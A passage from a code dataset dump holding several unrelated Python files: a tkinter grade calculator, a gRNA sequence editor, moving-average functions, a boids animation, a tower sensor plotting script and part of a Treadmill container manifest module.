text=\"Calculate\", font=self.calculateFont, command=self.Calculate, bg=\"green\") # Calculate button\r\n self.calculateClassScore.grid(row=16, column=15, rowspan=4, pady=(25, 15))\r\n\r\n directionsButton = Button(self, text=\"Directions\", command=self.directionsPopUp, bg=\"grey\") # Button to open up directions popup\r\n directionsButton.grid(row=0, column=15, rowspan=2)\r\n\r\n quitButton = Button(self, text=\"Quit\", command=sys.exit, bg=\"red\") # Button to quit the grade calculator. Terminates all processes\r\n quitButton.grid(row=2, column=15, rowspan=2, pady=(0, 25))\r\n\r\n\r\n def directionsPopUp(self): # Function that creates a directions popup for the user to read and follow\r\n popUp = Toplevel()\r\n popUp.title(\"Directions\")\r\n popUp.attributes('-topmost', 1) # Places the popup window on top of the grade calculator window\r\n directions = Message(popUp, text=\"Welcome to the Grade Calculator \\n\"\r\n \"1. Edit the grade scale first \\n\"\r\n \"2. Enter the weights for each section \\n\"\r\n \"After you add a section, please enter the score right away \\n\"\r\n \"(Only the last score can be edited) \\n\"\r\n \"Press calculate to update averages for each section and the class score\",\r\n font=self.directionsFont)\r\n directions.pack()\r\n dismiss = Button(popUp, text=\"OK\", command=popUp.destroy) # OK button closes the popup\r\n dismiss.pack()\r\n popUp.geometry(\"400x200\")\r\n\r\n def CreateGradeScale(self): # A function that creates a grade scale, customizable to the user\r\n\r\n Label(self, text='Grade').grid(row=4, column=14)\r\n Label(self, text=\"A\").grid(row=5, column=14)\r\n Label(self, text=\"A-\").grid(row=6, column=14)\r\n Label(self, text=\"B+\").grid(row=7, column=14)\r\n Label(self, text=\"B\").grid(row=8, column=14)\r\n Label(self, text=\"B-\").grid(row=9, column=14)\r\n Label(self, text=\"C+\").grid(row=10, column=14)\r\n Label(self, text=\"C\").grid(row=11, column=14)\r\n Label(self, text=\"C-\").grid(row=12, column=14)\r\n Label(self, text=\"D+\").grid(row=13, column=14)\r\n Label(self, text=\"D\").grid(row=14, column=14)\r\n\r\n Label(self, text=\"Percent\").grid(row=4, column=15)\r\n\r\n a_value = Entry(self) # The following lines are entry boxes for their respective letter grades\r\n a_value.grid(row=5, column=15)\r\n a_value.insert(0, 93) # Each is given a default value that can changed\r\n\r\n a_minus_value = Entry(self)\r\n a_minus_value.grid(row=6, column=15)\r\n a_minus_value.insert(0, 90)\r\n\r\n b_plus_value = Entry(self)\r\n b_plus_value.grid(row=7, column=15)\r\n b_plus_value.insert(0, 87)\r\n\r\n b_value = Entry(self)\r\n b_value.grid(row=8, column=15)\r\n b_value.insert(0, 83)\r\n\r\n b_minus_value = Entry(self)\r\n b_minus_value.grid(row=9, column=15)\r\n b_minus_value.insert(0, 80)\r\n\r\n c_plus_value = Entry(self)\r\n c_plus_value.grid(row=10, column=15)\r\n c_plus_value.insert(0, 77)\r\n\r\n c_value = Entry(self)\r\n c_value.grid(row=11, column=15)\r\n c_value.insert(0, 73)\r\n\r\n c_minus_value = Entry(self)\r\n c_minus_value.grid(row=12, column=15)\r\n c_minus_value.insert(0, 70)\r\n\r\n d_plus_value = Entry(self)\r\n d_plus_value.grid(row=13, column=15)\r\n d_plus_value.insert(0, 67)\r\n\r\n d_value = Entry(self)\r\n d_value.grid(row=14, column=15)\r\n d_value.insert(0, 63)\r\n\r\n grade_scale = [float(a_value.get()), float(a_minus_value.get()), float(b_plus_value.get()),\r\n float(b_value.get()),\r\n float(b_minus_value.get()), float(c_plus_value.get()), float(c_value.get()),\r\n float(c_minus_value.get()),\r\n 
float(d_plus_value.get()), float(d_value.get())]\r\n return grade_scale # The grade scale and the values are added to a list and that list is returned so they can be accessed by later functions\r\n\r\n\r\n def getGrade(self, fp, gs): # A function that determines the letter grade according to the final percent and the grade scale\r\n if fp >= gs[0]:\r\n return 'A'\r\n elif fp >= gs[1]:\r\n return 'A-'\r\n elif fp >= gs[2]:\r\n return 'B+'\r\n elif fp >= gs[3]:\r\n return 'B'\r\n elif fp >= gs[4]:\r\n return 'B-'\r\n elif fp >= gs[5]:\r\n return 'C+'\r\n elif fp >= gs[6]:\r\n return 'C'\r\n elif fp >= gs[7]:\r\n return 'C-'\r\n elif fp >= gs[8]:\r\n return 'D+'\r\n elif fp >= gs[9]:\r\n return 'D'\r\n else:\r\n return 'F'\r\n\r\n\r\n # *** All add functions are the same, but with different labels. They all work in the same way ***\r\n def addExam(self): # A function that adds an exam to the grade calculator\r\n\r\n if len(self.examList) != 0: # If there is an exam in the list already, the previous grade is stored.\r\n previousGrade = float(self.examGrade.get()) # This is so a user can change a grade and the new score is recorded\r\n examName = Entry(self) # The user is able to change the name of the exam.\r\n examName.grid(row=self.examNumber + 3, column=0)\r\n examName.insert(0, \"Exam \" + str(self.examNumber)) # By default, each exam is named exam + the exam number\r\n self.examGrade = Entry(self) # Entry box for the exam grade\r\n self.examGrade.grid(row=self.examNumber + 3, column=1)\r\n self.examGrade.insert(0, 0) # The default grade for each exam is 0\r\n\r\n if len(self.examList) == 0: # If there haven't been any exams recorded, the grade just entered is added\r\n self.examList.append(float(self.examGrade.get()))\r\n else:\r\n self.examList.append(float(previousGrade)) # If there are exams already, the previous grade is added. Again, so the user can edit\r\n\r\n sum = 0\r\n for i in range(len(self.examList)): # A for loop that goes through the list of exams and updates the exam average. 
Doesn't include newest exam that is 0\r\n sum += self.examList[i]\r\n if len(self.examList) != 0:\r\n newAvg = sum / len(self.examList)\r\n else:\r\n newAvg = 0 # If there is only 1 exam, the average is 0 because the new score hasn't been added to the list yet\r\n\r\n self.something = newAvg # Variable needed to store the averages as they update\r\n\r\n examAvg = Label(self, text=self.something) # Displays the new exam average\r\n Label(self, text=\"Exam Average\").grid(row=self.examNumber + 4, column=0) # Shows the exam average so far\r\n examAvg.grid(row=self.examNumber + 4, column=1)\r\n\r\n self.examNumber += 1 # The exam number is incremented\r\n\r\n\r\n def addAssignment(self):\r\n\r\n if len(self.assignmentList) != 0:\r\n previousGrade = float(self.assignmentGrade.get())\r\n assignmentName = Entry(self)\r\n assignmentName.grid(row=self.assignmentNumber + 3, column=4)\r\n assignmentName.insert(0, \"Assignment \" + str(self.assignmentNumber))\r\n self.assignmentGrade = Entry(self)\r\n self.assignmentGrade.grid(row=self.assignmentNumber + 3, column=5)\r\n self.assignmentGrade.insert(0, 0)\r\n\r\n if len(self.assignmentList) == 0:\r\n self.assignmentList.append(float(self.assignmentGrade.get()))\r\n else:\r\n self.assignmentList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.assignmentList)):\r\n sum += self.assignmentList[i]\r\n if len(self.assignmentList) != 0:\r\n newAvg = sum / len(self.assignmentList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n assignmentAvg = Label(self, text=self.something)\r\n assignmentAvg.grid(row=self.assignmentNumber + 4, column=5)\r\n Label(self, text=\"Assignment Average\").grid(row=self.assignmentNumber + 4, column=4)\r\n\r\n self.assignmentNumber += 1\r\n\r\n\r\n def addLab(self):\r\n\r\n if len(self.labList) != 0:\r\n previousGrade = float(self.labGrade.get())\r\n labName = Entry(self)\r\n labName.grid(row=self.labNumber + 3, column=8)\r\n labName.insert(0, \"Lab \" + str(self.labNumber))\r\n self.labGrade = Entry(self)\r\n self.labGrade.grid(row=self.labNumber + 3, column=9)\r\n self.labGrade.insert(0, 0)\r\n\r\n if len(self.labList) == 0:\r\n self.labList.append(float(self.labGrade.get()))\r\n else:\r\n self.labList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.labList)):\r\n sum += self.labList[i]\r\n if len(self.labList) != 0:\r\n newAvg = sum / len(self.labList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n labAvg = Label(self, text=self.something)\r\n Label(self, text=\"Lab Average\").grid(row=self.labNumber + 4, column=8)\r\n labAvg.grid(row=self.labNumber + 4, column=9)\r\n\r\n self.labNumber += 1\r\n\r\n\r\n def addQuiz(self):\r\n\r\n if len(self.quizList) != 0:\r\n previousGrade = float(self.quizGrade.get())\r\n quizName = Entry(self)\r\n quizName.grid(row=self.quizNumber + 22, column=0)\r\n quizName.insert(0, \"Quiz \" + str(self.quizNumber))\r\n self.quizGrade = Entry(self)\r\n self.quizGrade.grid(row=self.quizNumber + 22, column=1)\r\n self.quizGrade.insert(0, 0)\r\n\r\n if len(self.quizList) == 0:\r\n self.quizList.append(float(self.quizGrade.get()))\r\n else:\r\n self.quizList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.quizList)):\r\n sum += self.quizList[i]\r\n if len(self.quizList) != 0:\r\n newAvg = sum / len(self.quizList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n quizAvg = Label(self, text=self.something)\r\n Label(self, text=\"Quiz Average\").grid(row=self.quizNumber + 23, column=0)\r\n 
quizAvg.grid(row=self.quizNumber + 23, column=1)\r\n\r\n self.quizNumber += 1\r\n\r\n\r\n def addFinalExam(self):\r\n\r\n if len(self.finalExamList) != 0:\r\n previousGrade = float(self.finalExamGrade.get())\r\n finalExamName = Entry(self)\r\n finalExamName.grid(row=self.finalExamNumber + 22, column=4)\r\n finalExamName.insert(0, \"Final Exam\")\r\n self.finalExamGrade = Entry(self)\r\n self.finalExamGrade.grid(row=self.finalExamNumber + 22, column=5)\r\n self.finalExamGrade.insert(0, 0)\r\n\r\n if len(self.finalExamList) == 0:\r\n self.finalExamList.append(float(self.finalExamGrade.get()))\r\n else:\r\n self.finalExamList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.finalExamList)):\r\n sum += self.finalExamList[i]\r\n if len(self.finalExamList) != 0:\r\n newAvg = sum / len(self.finalExamList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n finalExamAvg = Label(self, text=self.something)\r\n finalExamAvg.grid(row=self.finalExamNumber + 23, column=5)\r\n Label(self, text=\"Final Exam Average\").grid(row=self.finalExamNumber + 23, column=4)\r\n\r\n self.finalExamNumber += 1\r\n\r\n\r\n def addEssay(self):\r\n\r\n if len(self.essayList) != 0:\r\n previousGrade = float(self.essayGrade.get())\r\n essayName = Entry(self)\r\n essayName.grid(row=self.essayNumber + 22, column=8)\r\n essayName.insert(0, \"Essay \" + str(self.essayNumber))\r\n self.essayGrade = Entry(self)\r\n self.essayGrade.grid(row=self.essayNumber + 22, column=9)\r\n self.essayGrade.insert(0, 0)\r\n\r\n if len(self.essayList) == 0:\r\n self.essayList.append(float(self.essayGrade.get()))\r\n else:\r\n self.essayList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.essayList)):\r\n sum += self.essayList[i]\r\n if len(self.essayList) != 0:\r\n newAvg = sum / len(self.essayList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n essayAvg = Label(self, text=self.something)\r\n Label(self, text=\"Essay Average\").grid(row=self.essayNumber + 23, column=8)\r\n essayAvg.grid(row=self.essayNumber + 23, column=9)\r\n\r\n self.essayNumber += 1\r\n\r\n\r\n\r\n\r\n # *** All calculate functions are the exact same, just with different names for different sections ***\r\n def calculateExams(self): # A function used by the Calculate function to calculate the exam average. Updates without adding a new exam\r\n\r\n if len(self.examList) != 0: # If the exam list has an exam in it, the previous grade is recorded. 
This is necessary because it hasn't been stored yet\r\n previousGrade = float(self.examGrade.get())\r\n self.examList[self.examNumber - 2] = previousGrade # The previous exam score is added to the end of the list, replaces the default 0\r\n else:\r\n self.examList.append(float(self.examGrade.get())) # If there is nothing else in the exam list, the grade is added\r\n\r\n sum = 0\r\n for i in range(len(self.examList)): # A for list that calculates the exam sum\r\n sum += self.examList[i]\r\n if len(self.examList) != 0:\r\n if len(self.examList) == 1: # If there is only 1 exam, that is the sum\r\n newAvg = self.examList[0]\r\n else:\r\n newAvg = sum / (len(self.examList)) # If there is more than 1 exam, the sum is divided by that number\r\n else:\r\n newAvg = 0 # If there are no exams, the exam average is 0\r\n\r\n self.something = newAvg # A variable needed to store the updating exam average\r\n examAvg = Label(self, text=self.something) # Updates the exam average label\r\n examAvg.grid(row=self.examNumber + 3, column=1)\r\n Label(self, text=\"Exam Average\").grid(row=self.examNumber + 3, column=0)\r\n return newAvg # The new average is returned so it can be used by other functions\r\n\r\n\r\n def calculateAssignments(self):\r\n\r\n if len(self.assignmentList) != 0:\r\n previousGrade = float(self.assignmentGrade.get())\r\n self.assignmentList[self.assignmentNumber - 2] = previousGrade\r\n else:\r\n self.assignmentList.append(float(self.assignmentGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.assignmentList)):\r\n sum += self.assignmentList[i]\r\n if len(self.assignmentList) != 0:\r\n if len(self.assignmentList) == 1:\r\n newAvg = self.assignmentList[0]\r\n else:\r\n newAvg = sum / (len(self.assignmentList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n assignmentAvg = Label(self, text=self.something)\r\n Label(self, text=\"Assignment Average\").grid(row=self.assignmentNumber + 3, column=4)\r\n assignmentAvg.grid(row=self.assignmentNumber + 3, column=5)\r\n\r\n return newAvg\r\n\r\n\r\n def calculateLabs(self):\r\n\r\n if len(self.labList) != 0:\r\n previousGrade = float(self.labGrade.get())\r\n self.labList[self.labNumber - 2] = previousGrade\r\n else:\r\n self.labList.append(float(self.labGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.labList)):\r\n sum += self.labList[i]\r\n if len(self.labList) != 0:\r\n if len(self.labList) == 1:\r\n newAvg = self.labList[0]\r\n else:\r\n newAvg = sum / (len(self.labList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n labAvg = Label(self, text=self.something)\r\n labAvg.grid(row=self.labNumber + 3, column=9)\r\n Label(self, text=\"Lab Average\").grid(row=self.labNumber + 3, column=8)\r\n return newAvg\r\n\r\n\r\n def calculateEssays(self):\r\n\r\n if len(self.essayList) != 0:\r\n previousGrade = float(self.essayGrade.get())\r\n self.essayList[self.essayNumber - 2] = previousGrade\r\n else:\r\n self.essayList.append(float(self.essayGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.essayList)):\r\n sum += self.essayList[i]\r\n if len(self.essayList) != 0:\r\n if len(self.essayList) == 1:\r\n newAvg = self.essayList[0]\r\n else:\r\n newAvg = sum / (len(self.essayList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n essayAvg = Label(self, text=self.something)\r\n essayAvg.grid(row=self.essayNumber + 22, column=9)\r\n Label(self, text=\"Essay Average\").grid(row=self.essayNumber + 22, column=8)\r\n return newAvg\r\n\r\n\r\n def calculateQuizzes(self):\r\n\r\n if len(self.quizList) != 
0:\r\n previousGrade = float(self.quizGrade.get())\r\n self.quizList[self.quizNumber - 2] = previousGrade\r\n else:\r\n self.quizList.append(float(self.quizGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.quizList)):\r\n sum += self.quizList[i]\r\n if len(self.quizList) != 0:\r\n if len(self.quizList) == 1:\r\n newAvg = self.quizList[0]\r\n else:\r\n newAvg = sum / (len(self.quizList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n quizAvg = Label(self, text=self.something)\r\n quizAvg.grid(row=self.quizNumber + 22, column=1)\r\n Label(self, text=\"Quiz Average\").grid(row=self.quizNumber + 22, column=0)\r\n return newAvg\r\n\r\n\r\n def calculateFinalExam(self):\r\n\r\n if len(self.finalExamList) != 0:\r\n previousGrade = float(self.finalExamGrade.get())\r\n self.finalExamList[self.finalExamNumber - 2] = previousGrade\r\n else:\r\n self.finalExamList.append(float(self.finalExamGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.finalExamList)):\r\n sum += self.finalExamList[i]\r\n if len(self.finalExamList) != 0:\r\n if len(self.finalExamList) == 1:\r\n newAvg = self.finalExamList[0]\r\n else:\r\n newAvg = sum / (len(self.finalExamList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n finalExamAvg = Label(self, text=self.something)\r\n Label(self, text=\"Final Exam Average\").grid(row=self.finalExamNumber + 22, column=4)\r\n finalExamAvg.grid(row=self.finalExamNumber + 22, column=5)\r\n\r\n return newAvg\r\n\r\n\r\n def Calculate(self): # A function that calls of the calculate functions and finds the final grade of the class\r\n examAverage = 0\r\n try:\r\n examAverage = self.calculateExams() # If there are no exams, an attribute error will appear. Same for the rest of the sections\r\n except AttributeError: # If this happens, the exam average is recorded as 0\r\n nothing = 0\r\n\r\n assignmentAverage = 0\r\n try:\r\n assignmentAverage = self.calculateAssignments()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n labAverage = 0\r\n try:\r\n labAverage = self.calculateLabs()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n quizAverage = 0\r\n try:\r\n quizAverage = self.calculateQuizzes()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n finalExamAverage = 0\r\n try:\r\n finalExamAverage = self.calculateFinalExam()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n essayAverage = 0\r\n try:\r\n essayAverage = self.calculateEssays()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n officialGrade = (examAverage * ((int(self.examWeight.get()))) + assignmentAverage * (\r\n (int(self.assignmentWeight.get())))\r\n + labAverage * ((int(self.labWeight.get()))) + quizAverage * ((int(self.quizWeight.get()))) +\r\n finalExamAverage * ((int(self.finalExamWeight.get()))) + essayAverage * (\r\n (int(self.essayWeight.get())))) / 100 # The final grade is calculated using the section weights and averages\r\n\r\n officialGradeLabel = Label(self, text=officialGrade, font=self.finalFont) # A label that shows the final percent\r\n officialGradeLabel.grid(row=21, column=15, rowspan = 2)\r\n\r\n gradeLetter = Label(self, text=self.getGrade(officialGrade, self.gradeScale), font=self.finalLetterFont) # A label that shows the final letter grade\r\n gradeLetter.grid(row=23, column=15, rowspan = 4) # Get this to update just like scores\r\n\r\n\r\n\r\ndef main(): # Main function\r\n\r\n root = Tk() # Creates an instance of the tkinter object\r\n\r\n app = GradeCalc(root) # Creates an instance of the grade calculator class, inheriting the tkinter object as a paramter\r\n 
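# note: GradeCalc subclasses Tk, so \"app\" is itself a top-level window; root is created only to satisfy the constructor and is hidden via root.withdraw() below\r\n    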
app.title(\"Grade Calculator\") # Names the window\r\n root.withdraw() # Needed to ignore the original root window\r\n\r\n app.state('zoomed') # Maximizes the grade calculator window\r\n root.mainloop() # Runs the loop\r\n\r\n\r\n\r\nif __name__ == '__main__': # A call to the main function\r\n main()","sub_path":"GradeCalculator/GradeCalculatorGUI.py","file_name":"GradeCalculatorGUI.py","file_ext":"py","file_size_in_byte":28798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"101529061","text":"def spliting(grna,seq):\r\n\tstart=seq.find(grna)\r\n\tstop=start+20\r\n\tlefseq=seq[:start-1]\r\n\trightseq=seq[stop+1:]\r\n\tdouble_lst=[lefseq,rightseq]\r\n\treturn double_lst\r\ndef replacing(lst):\r\n\tnew_lst=[seq.replace(\"GAGACG\",\"GAGAtG\") for seq in lst]\r\n\tnew_new_seq=[sequence.replace(\"CGTCTC\",\"CaTCTC\") for sequence in new_lst]\r\n\treturn new_new_seq\r\ndef tiankong(grna,lst):\r\n\tnewseq=lst[0]+grna+lst[1]\r\n\treturn newseq\r\nfasta={}\r\nfasta2={}\r\nwith open(\"C:/Users/Administrator/Desktop/output5-3-filter.txt\") as f:\r\n\tfor line in f:\r\n\t\ttag,tag2,tag3,grna,chr,pos,*seq=line.split(\"\\t\")\r\n\t\tnew_seq=[sequence.strip(\"\\n\").strip(\"\\t\").upper() for sequence in seq]\r\n\t\tnew_new_seq=[spliting(grna,haha) for haha in new_seq]\r\n\t\tfasta[tag]=new_new_seq\r\nfor key,val in fasta.items():\r\n\tfina_lst=[replacing(lst) for lst in val]\r\n\tfasta2[key]=fina_lst\r\nwith open(\"C:/Users/Administrator/Desktop/output5-3-filter.txt\") as k:\r\n\tfor line in k:\r\n\t\ttag,tag2,tag3,grna,chr,pos,*seq=line.split(\"\\t\")\r\n\t\tnew3_lst=[tiankong(grna,long) for long in fasta2[tag]]\r\n\t\twith open(\"C:/Users/Administrator/Desktop/final.txt\",'a') as h:\r\n\t\t\th.write(tag+\"\\t\"+tag2+\"\\t\"+tag3+\"\\t\"+grna+\"\\t\"+chr+\"\\t\"+pos+\"\\t\"+\"\\t\".join(new3_lst)+\"\\n\")\r\n\r\n","sub_path":"task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"177918795","text":"from __future__ import absolute_import\nimport numpy as np\nfrom pyti import catch_errors\nfrom pyti.function_helper import fill_for_noncomputable_vals\nfrom six.moves import range\n\n# import pandas as pd\n\n\n# legacy Pandas (too slow for backtesting)\n# def pandas_smoothed_moving_average(data, period):\n# \"\"\"\n# Smoothed Moving Average.\n#\n# Formula:\n# smma = avg(data(n)) - avg(data(n)/n) + data(t)/n\n# \"\"\"\n# catch_errors.check_for_period_error(data, period)\n# series = pd.Series(data)\n# return series.ewm(alpha = 1.0/period).mean().values.flatten()\n\n\n# faster alternative implementations\n###########################################\ndef smoothed_moving_average(data, window):\n data = np.array(data)\n alpha = 2 / (window + 1.0)\n alpha_rev = 1-alpha\n n = data.shape[0]\n\n pows = alpha_rev**(np.arange(n+1))\n\n scale_arr = 1/pows[:-1]\n offset = data[0]*pows[1:]\n pw0 = alpha*alpha_rev**(n-1)\n\n mult = data*pw0*scale_arr\n cumsums = mult.cumsum()\n out = offset + cumsums*scale_arr[::-1]\n return out\n\n\ndef alt2_smoothed_moving_average(data, period):\n \"\"\"\n Returns the exponentially weighted moving average of x.\n\n Parameters:\n -----------\n data : array-like\n period : float {0 <= period <= 1}\n\n Returns:\n --------\n ewma : numpy array\n the exponentially weighted moving average\n \"\"\"\n # coerce x to an array\n data = np.array(data)\n n = data.size\n # create an initial weight matrix of (1-alpha), and a 
matrix of powers\n # to raise the weights by\n w0 = np.ones(shape=(n, n)) * (1 - period)\n p = np.vstack([np.arange(i, i - n, -1) for i in range(n)])\n # create the weight matrix\n w = np.tril(w0 ** p, 0)\n # calculate the ewma\n return np.dot(w, data[::np.newaxis]) / w.sum(axis=1)\n\n\ndef alt3_smoothed_moving_average(data, window):\n data = np.array(data)\n alpha = 2 / (window + 1.0)\n scale = 1/(1-alpha)\n n = data.shape[0]\n scale_arr = (1-alpha)**(-1*np.arange(n))\n weights = (1-alpha)**np.arange(n)\n pw0 = (1-alpha)**(n-1)\n mult = data*pw0*scale_arr\n cumsums = mult.cumsum()\n out = cumsums*scale_arr[::-1] / weights.cumsum()\n\n return out\n","sub_path":"pyti/smoothed_moving_average.py","file_name":"smoothed_moving_average.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"137030674","text":"import netCDF4 as nc\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport sqlite3\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom matplotlib.ticker import MaxNLocator # for axis integer\nimport pandas as pd\nimport configparser\nimport time\nimport tower_lib as tl\n\nstart_time = time.time()\n\nCONFIG_NAME = \"../tower.conf\"\nDEBUG = False\n\n\ndef read_config(path):\n\n config = configparser.ConfigParser(\n interpolation=configparser.ExtendedInterpolation()\n )\n config.read(path)\n\n # settings = dict(config.items(\"paths\"))\n settings = dict(config[\"paths\"])\n # # Flatten the structure and convert the types of the parameters\n # settings = dict(\n # wwwpath=config.get(\"paths\", \"wwwpath\"),\n # datapath=config.get(\"paths\", \"datapath\"),\n # dbpath=config.get(\"paths\", \"dbpath\"),\n # dbfile=config.getint(\"paths\", \"dbfile\"),\n # npzpath=config.getfloat(\"paths\", \"npzpath\"),\n # L1path=config.getint(\"paths\", \"l1path\"),\n # L2path=config.get(\"paths\", \"l2path\"),\n # rrdpath=config.get(\"paths\", \"rrdpath\"),\n # )\n\n return settings\n\n\ndef smooth(x, window_len=11, window='hanning'):\n \"\"\"\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError(\"smooth only accepts 1 dimension arrays.\")\n if x.size < window_len:\n raise ValueError(\"Input vector needs to be bigger than window size.\")\n if window_len < 3:\n return x\n\n s = np.r_[2*x[0]-x[window_len-1::-1], x, 2*x[-1]-x[-1:-window_len:-1]]\n\n if window == 'flat': # moving average\n w = np.ones(window_len)\n elif window == 'hanning':\n w = np.hanning(window_len)\n elif window == 'hamming':\n w = np.hamming(window_len)\n elif window == 'bartlett':\n w = np.bartlett(window_len)\n elif window == 'blackman':\n w = np.blackman(window_len)\n else:\n raise ValueError(\"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\")\n\n y = np.convolve(w/w.sum(), s, mode='same')\n\n return y[window_len:-window_len+1]\n\n\ndef quality_info(datetimes, window_len, frequency):\n \"\"\" Computes gaps in data in every window_len (seconds) step\n with window_len step (not running value)\n \"\"\"\n normal_amount = window_len*frequency\n mask = np.full_like(datetimes, True)\n\n series = pd.Series(mask, index=datetimes)\n\n quality = (1 - series.resample(timedelta(seconds=window_len), label=\"left\").sum()/normal_amount)*100.\n\n return quality.index[1:-1], quality.values[1:-1]\n\n\nwindow=30 # rolling and resampling window (min)\n\n# First read sonfiguration\nconfig = read_config(CONFIG_NAME)\n\ndbfile = \"%s/%s\" % (config['dbpath'], config['dbfile'])\nconn = 
sqlite3.connect(dbfile)\ncur = conn.cursor()\ncur.execute('SELECT short_name FROM towers')\ntrows = cur.fetchall()\nfor trow in trows:\n tower_name = trow[0]\n print(\"Working on tower named: %s\" % (tower_name))\n\n plt, ax0, ax1 = tl.plot.web_accustic_stat_prep()\n cur.execute('SELECT equipment_name,Hz,height FROM equipment WHERE tower_name=? AND type=\"sonic\" AND show=1', (tower_name,))\n erows = cur.fetchall()\n for erow in erows:\n equipment_name = erow[0]\n frequency = float(erow[1])\n hgt = float(erow[2])\n print(\" Working on tower %s, equipment %s:\" % (tower_name, equipment_name))\n\n buffer_file = Path(config['buffer_path'],'%s_%s_BUFFER.npz' % (tower_name, equipment_name))\n\n try:\n data = tl.reader.buffer(buffer_file)\n except:\n data = tl.data.create_empty_pd()\n\n data = tl.data.clean(data)\n data = tl.math.primes(data,int(window*frequency*60), detrend='mean')\n data = tl.math.tke(data)\n plt, ax0, ax1 = tl.plot.web_accustic_stat(data, frequency=frequency, window=window*frequency*60, \n plt=plt, ax0=ax0, ax1=ax1, label=f\"{equipment_name} ({hgt} m)\")\n ax0.legend()\n ax1.legend()\n figname_data = \"%s/static/%s_STAT_data24hr_spec.png\" % (config['wwwpath'], tower_name)\n plt.savefig(figname_data, dpi=150)\n\n \nprint(\"{}: Running {:.2f} seconds, {:.2f} minutes \".format( datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n (time.time() - start_time),\n (time.time() - start_time)/60. ) )\n\n","sub_path":"scripts/plot_rtstat.py","file_name":"plot_rtstat.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"376604211","text":"\"\"\"\nA deliberately bad implementation of [Boids](http://dl.acm.org/citation.cfm?doid=37401.37406)\nfor use as an exercise on refactoring.\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import animation\n\nimport numpy\n\nfrom parameters import*\nimport boids\n\nflock=boids.boids(attraction_strength,boidproximitythreshold,matchspeed_distance,matchspeed_strength,number_of_boids)\nflock.initial_flock()\n\n\n\t\t\t\n\n\t\nfigure=plt.figure()\naxes=plt.axes(xlim=(-500,1500), ylim=(-500,1500))\n\nscatter=axes.scatter([boid.xposition for boid in flock.boids],[boid.yposition for boid in flock.boids])\n\ndef animate(frame):\n flock.update_boids()\n scatter.set_offsets(zip([boid.xposition for boid in flock.boids],[boid.yposition for boid in flock.boids]))\n\n\nanim = animation.FuncAnimation(figure, animate,\n frames=200, interval=50)\n\nif __name__ == \"__main__\":\n plt.show()\n\n\n","sub_path":"Animate.py","file_name":"Animate.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"93482030","text":"\"\"\"manifest module for linux runtime\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport pwd\n\nfrom treadmill import dist\nfrom treadmill import subproc\n\nfrom treadmill.appcfg import manifest as app_manifest\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef add_runtime(tm_env, manifest):\n \"\"\"Adds linux runtime specific details to the manifest.\n And add docker runtime specific details to the manifest\n \"\"\"\n _transform_services(manifest)\n\n app_manifest.add_linux_system_services(tm_env, manifest)\n app_manifest.add_linux_services(manifest)\n _add_dockerd_services(manifest, tm_env)\n\n\ndef 
_generate_command(raw_cmd, unique_id):\n    \"\"\"Get treadmill docker running command from image\n    \"\"\"\n    if raw_cmd.startswith('docker://'):\n        image_cmd = raw_cmd[9:].split(None, 1)\n        if len(image_cmd) > 1:\n            image = image_cmd[0]\n            cmd = image_cmd[1]\n        else:\n            image = image_cmd[0]\n            cmd = None\n        return _get_docker_run_cmd(unique_id, image, cmd)\n    else:\n        return raw_cmd\n\n\ndef _get_docker_run_cmd(unique_id, image, command=None, uidgid=None):\n    \"\"\"Get docker run cmd from raw command\n    \"\"\"\n    # TODO: hardcode volume for now\n    volumes = [\n        ('/var/tmp', '/var/tmp', 'rw'),\n        ('/var/spool', '/var/spool', 'rw'),\n    ]\n\n    tpl = (\n        'exec {tm} sproc docker'\n        ' --unique_id {unique_id}'\n        ' --envdirs /env,/services/{unique_id}/env'\n        ' --image {image}'\n    )\n\n    for volume in volumes:\n        tpl += ' --volume 